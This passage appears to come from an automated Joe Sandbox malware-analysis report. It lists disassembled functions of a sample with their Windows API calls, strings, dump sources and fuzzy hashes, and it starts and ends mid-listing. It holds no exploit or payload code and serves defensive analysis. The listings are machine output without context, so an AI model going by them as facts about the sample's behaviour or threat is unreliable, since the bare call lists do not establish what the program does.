                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0059759E
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 005975B2
                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005975BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                      • String ID: static
                                                                      • API String ID: 2559357485-2160076837
                                                                      • Opcode ID: 55ce3fa509fcceb4fdaab027a2aa794716aaf98f1058997956f5ce6748a785e6
                                                                      • Instruction ID: 02673b8655715e151bdf12817354c6699df4a203e11564919eacc063d7cd750f
                                                                      • Opcode Fuzzy Hash: 55ce3fa509fcceb4fdaab027a2aa794716aaf98f1058997956f5ce6748a785e6
                                                                      • Instruction Fuzzy Hash: B4316A72105219ABDF119FA4DC09FDA3F69FF1D360F160226FA15E60A0D731D825EBA4
                                                                      Function 00536E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00536E3E
                                                                        • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
                                                                      • __gmtime64_s.LIBCMT ref: 00536ED7
                                                                      • __gmtime64_s.LIBCMT ref: 00536F0D
                                                                      • __gmtime64_s.LIBCMT ref: 00536F2A
                                                                      • __allrem.LIBCMT ref: 00536F80
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00536F9C
                                                                      • __allrem.LIBCMT ref: 00536FB3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00536FD1
                                                                      • __allrem.LIBCMT ref: 00536FE8
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00537006
                                                                      • __invoke_watson.LIBCMT ref: 00537077
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                      • String ID:
                                                                      • API String ID: 384356119-0
                                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction ID: 11c87d038a7e543ca2585bc4dd49e6a36ac2c19981917eec0bd570904bf4e4c7
                                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction Fuzzy Hash: FB71F8B6A00717ABD728AE69DC45BABBBA8BF44324F14852DF514D7281E770D9008B90
                                                                      Function 00572527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572542
                                                                      • GetMenuItemInfoW.USER32(005D5890,000000FF,00000000,00000030), ref: 005725A3
                                                                      • SetMenuItemInfoW.USER32(005D5890,00000004,00000000,00000030), ref: 005725D9
                                                                      • Sleep.KERNEL32(000001F4), ref: 005725EB
                                                                      • GetMenuItemCount.USER32(?), ref: 0057262F
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0057264B
                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00572675
                                                                      • GetMenuItemID.USER32(?,?), ref: 005726BA
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00572700
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572714
                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572735
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                      • String ID:
                                                                      • API String ID: 4176008265-0
                                                                      • Opcode ID: 93d58fa540cc4e279594f2eb6938a8c84d4b98cdfddf8e849e3b701b6f4cecea
                                                                      • Instruction ID: 11def100327168f843e18484a8d5ac126b02936d15eadeee7d62cc4b8c6e6a64
                                                                      • Opcode Fuzzy Hash: 93d58fa540cc4e279594f2eb6938a8c84d4b98cdfddf8e849e3b701b6f4cecea
                                                                      • Instruction Fuzzy Hash: 31618E7090024AAFDF21CF64ED88DAE7FB8FB45344F15845AE845A7251DB31AD09FB21
                                                                      Function 00596F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00596FA5
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00596FA8
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00596FCC
                                                                      • _memset.LIBCMT ref: 00596FDD
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00596FEF
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00597067
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 830647256-0
                                                                      • Opcode ID: 73fb80eddc0c1304a5eb708998a69ec198e0c92dcf1966266010273bc1831f33
                                                                      • Instruction ID: 4859097284766bafa6fa506f6a11412115fe9f8e95e975d9e14ef3f4978f3e67
                                                                      • Opcode Fuzzy Hash: 73fb80eddc0c1304a5eb708998a69ec198e0c92dcf1966266010273bc1831f33
                                                                      • Instruction Fuzzy Hash: 10616C75900208AFDB21DFA4CC85EEE7BB8FB49710F10015AFA14AB2A1D771AD45DB90
                                                                      Function 00566B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00566BBF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00566C18
                                                                      • VariantInit.OLEAUT32(?), ref: 00566C2A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00566C4A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00566C9D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00566CB1
                                                                      • VariantClear.OLEAUT32(?), ref: 00566CC6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00566CD3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00566CDC
                                                                      • VariantClear.OLEAUT32(?), ref: 00566CEE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00566CF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: d79eabb94d476f15e759aad9ab0b66c54a1ed2a81de1ad514312357a04389ba5
                                                                      • Instruction ID: eeb292ff1d4036d73dce7ac3ec6fce1b57d68aa30e27bdd51d0f29e169fed654
                                                                      • Opcode Fuzzy Hash: d79eabb94d476f15e759aad9ab0b66c54a1ed2a81de1ad514312357a04389ba5
                                                                      • Instruction Fuzzy Hash: 66415175A0021AAFDF00DF68D8489EEBFB9FF58354F018069E955E7261CB30AD45DB90
                                                                      Function 005883BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • CoInitialize.OLE32 ref: 00588403
                                                                      • CoUninitialize.OLE32 ref: 0058840E
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,005A2BEC,?), ref: 0058846E
                                                                      • IIDFromString.OLE32(?,?), ref: 005884E1
                                                                      • VariantInit.OLEAUT32(?), ref: 0058857B
                                                                      • VariantClear.OLEAUT32(?), ref: 005885DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 834269672-1287834457
                                                                      • Opcode ID: b55d3e3c8bf65db7ffd215bb1c14d21aa8ee9e3de436da7b95b7b9a650bc9d1b
                                                                      • Instruction ID: 45a4c2369e8151c63a867f70457bb779a68b7af9bd036ec0c71cd1aad084b6f4
                                                                      • Opcode Fuzzy Hash: b55d3e3c8bf65db7ffd215bb1c14d21aa8ee9e3de436da7b95b7b9a650bc9d1b
                                                                      • Instruction Fuzzy Hash: 8C617D71608312AFD710EF54C849F6ABBE4FF89754F444819F985AB2A1CB70ED48CB92
                                                                      Function 00585732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00585793
                                                                      • inet_addr.WSOCK32(?,?,?), ref: 005857D8
                                                                      • gethostbyname.WSOCK32(?), ref: 005857E4
                                                                      • IcmpCreateFile.IPHLPAPI ref: 005857F2
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585862
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00585878
                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 005858ED
                                                                      • WSACleanup.WSOCK32 ref: 005858F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: 44c90c02503ccc8434ac5b2e08b19ecfe9312e996f7378b327334f739973ec76
                                                                      • Instruction ID: 467d887ab6c00a1a0f299270cd8af666c3b82d4b69bfef9456b839b0d0a692b2
                                                                      • Opcode Fuzzy Hash: 44c90c02503ccc8434ac5b2e08b19ecfe9312e996f7378b327334f739973ec76
                                                                      • Instruction Fuzzy Hash: 42516E31604601DFEB10AF65DC49B6A7BE4FF84710F14492AF996EB2A1EB30E944DF42
                                                                      Function 0057B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0057B4D0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0057B546
                                                                      • GetLastError.KERNEL32 ref: 0057B550
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0057B5BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 3d2e3db6f0a8fec87e85bf0ea36731fe352bce6852178c1a8125634642faaeb2
                                                                      • Instruction ID: c38bca42c91b8770a367750280b7f1fd8552231b2c9590ff44706726dbc6fd50
                                                                      • Opcode Fuzzy Hash: 3d2e3db6f0a8fec87e85bf0ea36731fe352bce6852178c1a8125634642faaeb2
                                                                      • Instruction Fuzzy Hash: 1631A335A0020ADFEB00DB68D849FBE7FB4FF48314F108166E509D7291EB709A45EB51
                                                                      Function 00568F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00569014
                                                                      • GetDlgCtrlID.USER32 ref: 0056901F
                                                                      • GetParent.USER32 ref: 0056903B
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0056903E
                                                                      • GetDlgCtrlID.USER32(?), ref: 00569047
                                                                      • GetParent.USER32(?), ref: 00569063
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569066
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      • Opcode ID: a4cd657f487a171ab3c3b2b5d787fb569d6cea35b7f98366a901d13dfccbb590
                                                                      • Instruction ID: be932247268e1358938f86f9e875e87a18a616fc4952592e837d3b2159b55630
                                                                      • Opcode Fuzzy Hash: a4cd657f487a171ab3c3b2b5d787fb569d6cea35b7f98366a901d13dfccbb590
                                                                      • Instruction Fuzzy Hash: DC21D874A00209BFDF04ABA4DC89EFEBF78FF99310F100116B521972A1DB755859DB20
                                                                      Function 0056907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005690FD
                                                                      • GetDlgCtrlID.USER32 ref: 00569108
                                                                      • GetParent.USER32 ref: 00569124
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00569127
                                                                      • GetDlgCtrlID.USER32(?), ref: 00569130
                                                                      • GetParent.USER32(?), ref: 0056914C
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0056914F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      • Opcode ID: d19a8d5528485fa8b9535cbdc1081ab57ff02bf806033e5beb17ac3a87dff672
                                                                      • Instruction ID: 04f8bda2fdd3e34ad43f2a8b78c6cc911deed09a20b16b6ceb3588d281a5358f
                                                                      • Opcode Fuzzy Hash: d19a8d5528485fa8b9535cbdc1081ab57ff02bf806033e5beb17ac3a87dff672
                                                                      • Instruction Fuzzy Hash: 9821C875A00209BFDF01ABA4DC89EFEBF78FF99300F114016B511972A1DB795459DB20
                                                                      Function 00569163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32 ref: 0056916F
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00569184
                                                                      • _wcscmp.LIBCMT ref: 00569196
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00569211
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1704125052-3381328864
                                                                      • Opcode ID: 0112b051cfe9c1301a07c1cc090f1d8e3fd17e7ffdb6a67e408d19f7c09ae6c3
                                                                      • Instruction ID: 439d8cf44d6f8e67912561ea014994b4a675c21df1e3f32d3248b440edd8cbb1
                                                                      • Opcode Fuzzy Hash: 0112b051cfe9c1301a07c1cc090f1d8e3fd17e7ffdb6a67e408d19f7c09ae6c3
                                                                      • Instruction Fuzzy Hash: DE11EC3A24C70BB9FA112664EC1BDB73F9CFB55720F200426F910E64D1FE7158516A54
                                                                      Function 00577990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00577A6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafeVartype
                                                                      • String ID:
                                                                      • API String ID: 1725837607-0
                                                                      • Opcode ID: 482c1eee5c30882c2db8a2d96c5555623d3edbc432146f5befa65a55516f1bfe
                                                                      • Instruction ID: 2aceb7b5052f2002bf9816854c41c745bbebab2fcd81cd221bb905c3ba479b3b
                                                                      • Opcode Fuzzy Hash: 482c1eee5c30882c2db8a2d96c5555623d3edbc432146f5befa65a55516f1bfe
                                                                      • Instruction Fuzzy Hash: 6FB18E7190421A9FDB01DFA4E885BBEBBB8FF4D321F218425E609E7241D734A941EB91
                                                                      Function 005711CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 005711F0
                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00570268,?,00000001), ref: 00571204
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0057120B
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570268,?,00000001), ref: 0057121A
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0057122C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570268,?,00000001), ref: 00571245
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570268,?,00000001), ref: 00571257
                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00570268,?,00000001), ref: 0057129C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570268,?,00000001), ref: 005712B1
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570268,?,00000001), ref: 005712BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 6d0f1a22f3dd5756f5412cf39e7c83f33a659938283f4faa5d540749cb8402e5
                                                                      • Instruction ID: 71a4b00d8da190871f520bb1763dd3eab095b04e7a0958a8537834f4ef08ecaf
                                                                      • Opcode Fuzzy Hash: 6d0f1a22f3dd5756f5412cf39e7c83f33a659938283f4faa5d540749cb8402e5
                                                                      • Instruction Fuzzy Hash: A531E179601B04BBDB309F59FD48F693BA9FB64311F118117F808D61A1E7709D88AB54
                                                                      Function 0051FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0051FAA6
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 0051FB45
                                                                      • UnregisterHotKey.USER32(?), ref: 0051FC9C
                                                                      • DestroyWindow.USER32(?), ref: 005545D6
                                                                      • FreeLibrary.KERNEL32(?), ref: 0055463B
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00554668
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
